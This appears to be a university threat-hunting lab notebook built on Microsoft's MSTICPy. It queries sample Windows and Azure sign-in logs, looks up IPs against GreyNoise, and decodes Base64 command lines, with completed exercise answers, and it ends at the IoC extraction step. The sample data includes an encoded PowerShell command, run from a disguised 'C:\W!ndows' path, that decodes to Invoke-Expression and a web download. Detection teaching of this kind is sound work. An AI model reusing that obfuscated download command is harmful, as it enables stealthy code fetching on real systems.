UFCFFY-15-M Cyber Security Analytics¶

Practical Lab 3: Threat Hunting using MSTICPy (Microsoft Threat Intelligence Centre Python)¶


In this lab we will explore the concept of Threat Hunting using the MSTICPy library - a Python library specifically developed by Microsoft for Security Threat Intelligence. This lab is based on the full lab provided by MSTICpy - we will focus here on some core aspects only, as well as an initial introduction to some of the Machine Learning capabilities. All credit to the MSTICpy team for providing this open-source library for community use.

Content:

  • 01: Data Acquisition
  • 02: Enrich Data
  • 03: Extracting key data
  • 04: Data Visualization
  • 05: Machine Learning using MSTICPy

Tip: You can either use the copy below to explore the MSTICPy library, or you can navigate directly to their Github page: https://github.com/microsoft/msticpy-lab. You may also choose to use their Binder instance where all dependencies are pre-installed and available.

The purpose of this lab is to develop your awareness of the MSTICPy library, and the community-driven effort of InfoSec Jupytercon.


In [1]:
%%capture capt

### We need to install the following Python libraries
!pip install msticpy --user
!pip install msticnb --user

### We also need to clone the MSTICpy lab repository to acquire some further data that will be used in this lab
!git clone https://github.com/microsoft/msticpy-lab.git
In [14]:
from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals()
)

MSTICPYCONFIG = './msticpy-lab/msticpyconfig.yaml'
ti = TILookup()
TILookup.list_available_providers()
ti.reload_providers()
ti.provider_status

Starting Notebook initialization...


msticpy version installed: 1.6.1 latest published: 1.6.1
Latest version is installed.

Processing imports....
Imported: pd (pandas), IPython.get_ipython, IPython.display.display, IPython.display.HTML, IPython.display.Markdown, widgets (ipywidgets), pathlib.Path, plt (matplotlib.pyplot), matplotlib.MatplotlibDeprecationWarning, np (numpy), sns (seaborn), msticpy, msticpy.data.QueryProvider, msticpy.nbtools.foliummap.FoliumMap, msticpy.common.utility.md, msticpy.common.utility.md_warn, msticpy.common.wsconfig.WorkspaceConfig, msticpy.datamodel.pivot.Pivot, msticpy.datamodel.entities, msticpy.vis.mp_pandas_plot
Checking configuration....
No valid configuration for Microsoft Sentinel found.
Azure CLI credentials not detected. (see Caching credentials with Azure CLI)
Setting notebook options....


Notebook setup completed with some warnings.

One or more configuration items were missing or set incorrectly.

Please run the Getting Started Guide for Azure Sentinel ML Notebooks notebook. and the msticpy configuration guide.

This notebook may still run but with reduced functionality.

Notebook initialization complete


AzSTI
GreyNoise
OPR
OTX
Tor
VirusTotal
XForce
Settings reloaded. Use reload_providers to update settings for loaded providers.
Out[14]:
[]

01: Data Acquisition¶

The starting point for many security analysis notebooks is ingesting data to conduct analysis or investigation of. MSTICpy has a number of query providers to allow users to query and return data from a number of sources. Below we are using the Local Data query provider to return data from local files. This is useful for this lab but is also useful if analysis is relying on local data rather than a 'live' data source.

In order to provide a common interface layer between data and features in MSTICPy all data is returned in a Pandas DataFrame DataFrame. As well as providing a consistent framework for other features to user it also allows for easy manipulation and analysis of the returned data using Pandas numerous features.

The first step in using a query provider is to initialize a QueryProvider and pass it the type of provider you want to use. Depending on the provider type you can also pass other required parameters. In the cell below we create a LocalData provider and pass it the location of where are local data files and their definitions are stored.

Each provider contains a series of built-in queries. These are pre-defined queries that return a specific subset of data, for our LocalData provider this is a specific file, however for a 'live' data source such as Azure Sentinel these will execute queries against that data source and return the results.

Once the query provider has been created we can use the browse_queries feature to interactively view the available queries.

In [4]:
# We start by loading a query provider for our `LocalData` source.
data_path = "./msticpy-lab/data"

qry_prov = QueryProvider(data_environment="LocalData", data_paths=[data_path], query_paths=[data_path])
# We can then look at the queries built into a provider by default
qry_prov.browse_queries()
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

Office 365 activity

Parameters


Query

exchange_admin.pkl

Example

{QueryProvider}[.QueryPath].QueryName(params...)

qry_prov.Azure.OfficeActivity(start=start, end=end, hostname=host)

Once a query has been selected you call it directly with qry_prov.{query_group}.{query_name} . You can also pass extra parameters to these queries where they have configurable elements (often things such as timeframes and specific entities to search for). In addition the query providers also allow you to execute a query defined as a string by calling qry_prov.exec_query(QUERY_STRING)

The returned dataframe contains the query results and can be displayed and interacted with as with any other Pandas dataframe.

In [5]:
events = qry_prov.WindowsSecurity.list_host_events()
events.head()
Out[5]:
TenantId TimeGenerated SourceSystem Account AccountType Computer EventSourceName Channel Task Level EventData EventID Activity PartitionKey RowKey StorageAccount AzureDeploymentID AzureTableName AccessList AccessMask AccessReason AccountDomain AccountExpires AccountName AccountSessionIdentifier ... TargetUserSid TemplateContent TemplateDSObjectFQDN TemplateInternalName TemplateOID TemplateSchemaVersion TemplateVersion TokenElevationType TransmittedServices UserAccountControl UserParameters UserPrincipalName UserWorkstations VirtualAccount VendorIds Workstation WorkstationName SourceComputerId EventOriginId MG TimeCollected ManagementGroupName Type _ResourceId EventProperties
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:22.537 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13826 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4799 4799 - A security-enabled local group membership was enumerated ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 d0ec0118-9b6b-477e-ba9f-e4ead3665884 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Remote Desktop Users', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32...
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.827 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13826 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4799 4799 - A security-enabled local group membership was enumerated ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 5365f041-1345-4cd0-8fbb-41ccbaa16a39 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Administrators', 'TargetDomainName': 'Builtin', 'TargetSid': 'S-1-5-32-544',...
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.827 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 5333954d-9157-443c-9657-6ef390c73abb 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'MSTICAdmin', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-21-9...
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.833 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 d2fded8a-e507-4017-aedd-cb6da6a2b624 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'DefaultAccount', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-...
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-11 08:40:24.833 OpsManager WORKGROUP\MSTICAlertsWin1$ Machine MSTICAlertsWin1 Microsoft-Windows-Security-Auditing Security 13824 8 <EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">\r\n <Data Name="Targe... 4798 4798 - A user's local group membership was enumerated. ... 263a788b-6526-4cdc-8ed9-d79402fe4aa0 701504d1-e106-48ca-b424-d9ec20f17746 00000000-0000-0000-0000-000000000001 2019-02-11 08:40:40.387 AOI-52b1ab41-869e-4138-9e40-2a4457f09bf0 SecurityEvent /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/provide... {'TargetUserName': 'Guest', 'TargetDomainName': 'MSTICAlertsWin1', 'TargetSid': 'S-1-5-21-996632...

5 rows × 226 columns

Lab Exercise 1

In the cell below write code that uses the query provider created above (`qry_prov`) to get data relating to security alerts using a built-in query. You can use the query browser above to find the most suitable query to run.
Hint: Queries relating to security alerts are part of the SecurityAlert query type.
In [6]:
# Get security alert data
query = qry_prov.SecurityAlert.list_alerts()
query.head(5)
Out[6]:
TenantId TimeGenerated AlertDisplayName AlertName Severity Description ProviderName VendorName VendorOriginalId SystemAlertId ResourceId SourceComputerId AlertType ConfidenceLevel ConfidenceScore IsIncident StartTimeUtc EndTimeUtc ProcessingEndTime RemediationSteps ExtendedProperties Entities SourceSystem WorkspaceSubscriptionId WorkspaceResourceGroup ExtendedLinks ProductName ProductComponentName AlertLink Type CompromisedEntity
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:29:07 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule b0e143b8-4fa8-47bc-8bc1-9780c8b75541 f1ce87ca-8863-4a66-a0bd-a4d3776a7c64 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:49:02 2019-02-18 02:19:02 2019-02-18 02:29:07 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 01:59:09 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 4f454388-02d3-4ace-98bf-3a7e4fdef361 3968ef4e-b322-48ca-b297-e984aff8888d CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:19:02 2019-02-18 01:49:02 2019-02-18 01:59:09 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "203.0.113.1",\r\n "Type": "ip",\r\n "Count"... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:29:07 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule b0e143b8-4fa8-47bc-8bc1-9780c8b75541 3a78a119-abe9-4b5e-9786-300ddcfd9530 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:49:02 2019-02-18 02:19:02 2019-02-18 02:29:07 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 02:43:27 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 3f27593a-db5b-4ef4-bdc5-f6ce1915f496 8f622935-1422-41e6-b8f6-9119e681645c CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:33:19 2019-02-18 02:33:19 2019-02-18 02:43:27 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "23.97.60.214",\r\n "Type": "ip",\r\n "Count... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 2019-02-18 01:54:11 SSH Anomalous Login ML SSH Anomalous Login ML Low Anomalous login detected for SSH account CustomAlertRule Alert Rule 3cbe0028-14e8-43ad-8dc2-77c96d8bb015 64a2b4af-c3d7-422c-820b-7f1feb664222 CustomAlertRule_0a4e5f7c-9756-45f8-83c4-94c756844698 Unknown NaN False 2019-02-18 01:14:02 2019-02-18 01:44:02 2019-02-18 01:54:11 {\r\n "Alert Mode": "Aggregated",\r\n "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subsc... [\r\n {\r\n "$id": "3",\r\n "Address": "203.0.113.1",\r\n "Type": "ip",\r\n "Count"... Detection 40dcc8bf-0478-4f3b-b275-ed0a94f2c013 asihuntomsworkspacerg SecurityAlert

02: Enrich Data¶

A key analysis step for security analysts is to take a dataset, extract relevant elements and enrich it with another dataset to help filter it. A common example of this is taking IP addresses in log data and seeing if any of them appear in threat intelligence data.

In the cells below we use MSTICPy's query provider to get sign in event data, and then look up the IPs those sign-ins have come from against a threat intelligence provider's API using the MSTICPy threat intelligence features. In this case we are using the GreyNoise provider.

In [7]:
# First we are going to use a built in query to get all of our signin data from our Windows host
data = qry_prov.WindowsSecurity.list_host_logons()
data.head()
Out[7]:
TenantId Account EventID TimeGenerated SourceComputerId Computer SubjectUserName SubjectDomainName SubjectUserSid TargetUserName TargetDomainName TargetUserSid TargetLogonId LogonProcessName LogonType AuthenticationPackageName Status IpAddress WorkstationName TimeCreatedUtc
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 NT AUTHORITY\SYSTEM 4624 2019-02-12 04:56:34.307 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 MSTICAlertsWin1$ WORKGROUP S-1-5-18 SYSTEM NT AUTHORITY S-1-5-18 0x3e7 Advapi 5 Negotiate - - 2019-02-12 04:56:34.307
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:37:25.340 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc90e957 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:37:25.340
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:37:27.997 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc90ea44 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:37:27.997
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:38:16.550 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc912d62 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:38:16.550
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4624 2019-02-12 04:38:21.370 263a788b-6526-4cdc-8ed9-d79402fe4aa0 MSTICAlertsWin1 - - S-1-0-0 MSTICAdmin MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 0xc913737 NtLmSsp 3 NTLM 131.107.147.209 IANHELLE-DEV17 2019-02-12 04:38:21.370

MSTICPy includes a Threat Intelligence (TI) lookup provider TILookup that allows for key indicators to be searched for in various different services. The provider can be configured to use a range of different providers, and queries can be specifically targeted at a provider if required. MSTICPY current supports the following providers:

  • VirusTotal
  • AlienVault OTX
  • IBM XForce
  • GreyNoise
  • Azure Sentinel Threat Intelligence

There is also support via the TI lookup provider to get the Open Page Rank for a domain, and determine if an IP address is a ToR exit node.

When instantiating a TI provider you can define the providers you want it to load, or you can let it search for a MSTICPy config file and take configuration from there - this is the approach we are taking in this lab.

In [12]:
# Next we need to load our TI providers
ti = TILookup()

.loaded_providers shows which providers have been loaded by the TI lookup provider.

In [13]:
# For this lab we are just using the GreyNoise provider
ti.loaded_providers
Out[13]:
ChainMap({}, {})

Once loaded you can use lookup_ioc to look up a single indicator, or lookup_iocs to look up every value in a dataframe column.

In this example we want to look up every IP address in our results dataframe, so we are going to use lookup_iocs, tell it to look up values in the "IpAddress" column, and use the GreyNoise service to do the lookups.

Once we have results you can either display the results statically or use browse_results to get an interactive view of the results.

In [97]:
# Here we lookup each of the IP addresses in our dataset
results = ti.lookup_iocs(data, obs_col="IpAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

131.107.147.209

Type: 'ipv4', Provider: GreyNoise, severity: information

Details

Not found.

Reference:

https://api.greynoise.io/v3/community/131.107.147.209

Raw Results

Raw results from provider...
''

Lab Exercise 2

Now that you have seen how to return and enrich data, complete the code in the following two cells to get a list of Azure AD sign in events and look up the origin IP addresses against threat intelligence.

Additional documentation on the threat intelligence provider can be found here

Hint:
  • Remember to pass `obs_col="IPAddress"` to `lookup_iocs` to get lookups on the correct column
  • You can reuse the TI provider assigned to `ti` in the cells above
In [115]:
# Use the query provider qry_prov to get Azure signin data with the list_all_signins_geo query
query = qry_prov.Azure.list_all_signins_geo()
query.head()
Out[115]:
TenantId SourceSystem TimeGenerated ResourceId OperationName OperationVersion Category ResultType ResultSignature ResultDescription DurationMs CorrelationId Resource ResourceGroup ResourceProvider Identity Level Location AlternateSignInName AppDisplayName AppId AuthenticationDetails AuthenticationMethodsUsed AuthenticationProcessingDetails AuthenticationRequirement ... NetworkLocationDetails OriginalRequestId ProcessingTimeInMilliseconds RiskDetail RiskEventTypes RiskEventTypes_V2 RiskLevelAggregated RiskLevelDuringSignIn RiskState ResourceDisplayName ResourceIdentity ServicePrincipalId ServicePrincipalName Status TokenIssuerName TokenIssuerType UserAgent UserDisplayName UserId UserPrincipalName AADTenantId Type Result Latitude Longitude
0 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
1 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
2 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
3 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
4 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 05:35.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 bf124019-b325-4a4a-81ff-6c2823461620 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n }\r\n] singleFactorAuthentication ... [] 39f36cc7-ad3e-430c-bf78-bc96fbc33300 553 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safa... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 41.465630 -73.610718

5 rows × 62 columns

In [116]:
# Lookup the IP addresses in the IPAddress column using the GreyNoise TI provider
results = ti.lookup_iocs(query, obs_col="IPAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])
VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…

109.88.218.99

Type: 'ipv4', Provider: GreyNoise, severity: information

Details

Not found.

Reference:

https://api.greynoise.io/v3/community/109.88.218.99

Raw Results

Raw results from provider...
''

03: Extracting key data¶

Often when working with security related data the indicators you need are not as readily available as they were in the example above. Often, they can be encoded or otherwise obscured from human analysis. MSTICPy also includes tooling to help security analysts quickly decode this data for further analysis.

In this section we are going to query our datasets for command line data, decode any Base64 encoding in the command lines using the base64 feature, and then extract known indicator types (such as IP addresses and domain names) from that data using the IoCExtract feature.

In [117]:
# Load command line data set
cmdl_data = qry_prov.WindowsSecurity.list_host_processes()
cmdl_data.head()
Out[117]:
TenantId Account EventID TimeGenerated Computer SubjectUserSid SubjectUserName SubjectDomainName SubjectLogonId NewProcessId NewProcessName TokenElevationType ProcessId CommandLine ParentProcessName TargetLogonId SourceComputerId TimeCreatedUtc
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:21 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0xd78 C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe %%1936 0x1994 "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df... C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 21:06.9
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:21 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x221c C:\Windows\System32\conhost.exe %%1936 0xd78 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 21:06.9
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 2:15 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x638 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon... %%1936 0xe24 "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF/DesiredStateCo... C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 15:36.3
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 2:15 PM MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ WORKGROUP 0x3e7 0x115c C:\Windows\System32\conhost.exe %%1936 0x638 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\ICT 2\CMF\DesiredStateCon... 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 15:36.3
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:48 PM MSTICAlertsWin1 S-1-5-20 MSTICAlertsWin1$ WORKGROUP 0x3e4 0x2364 C:\Windows\System32\reg.exe %%1936 0x1c24 reg "C:\diagnostics\WinBenignActivity.cmd" -25563 /10689 C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 48:18.4

Now that we have some data, we can call base64.unpack_df and tell it to unpack data found in the 'CommandLine' column. This feature will look for Base64 patterns in that column, attempt to unpack any it finds and present us with the decoded output.

base64.unpack_df provides an output of just elements relevant to the decoded string, to get some context on where this string was found we next join it back to the original dataset so that we can see the log event and the decoded string in the same dataset.

In [118]:
# Base64 decode
b64df = base64.unpack_df(data=cmdl_data.head(1000), column='CommandLine')

b64df['SourceIndex'] = pd.to_numeric(b64df['src_index'])

merged_df = (cmdl_data
             .merge(right=b64df, how='left', left_index=True, right_on='SourceIndex')
             #.drop(columns=['Unnamed: 0'])
             .set_index('SourceIndex'))

# Show the result of the merge (only those rows that have a value in original_string)
merged_filtered = merged_df.dropna(subset=['decoded_string'])[["TimeGenerated", "Account", "Computer", "NewProcessName", "CommandLine_x", "decoded_string"]]

merged_filtered
Out[118]:
TimeGenerated Account Computer NewProcessName CommandLine_x decoded_string
SourceIndex
21 2/10/19 3:50 PM WORKGROUP\MSTICAlertsWin1$ MSTICAlertsWin1 C:\Windows\System32\PING.EXE cGluZyAgbWljcm9zb2Z0LmNvbSAtbiAxNSA= ping microsoft.com -n 15
968 2/9/19 11:26 PM MSTICAlertsWin1\MSTICAdmin MSTICAlertsWin1 C:\W!ndows\System32\powershell.exe .\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdld... -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...

Now that we have the decoded string, we can look for any Indicators of Compromise (IoCs) in these strings. Using MSTICPy's IoCExtract we can search all of these decoded strings for things such as IP addresses, file hashes and URLs. You can choose to search specific indicator types by passing the ioc_types parameter but we want to just search for everything.

MSTICPy has a set of common IoC patterns to search for and extract but you can also extend this by adding your own regex patterns with add_ioc_type.

In [108]:
# Extract IoCs
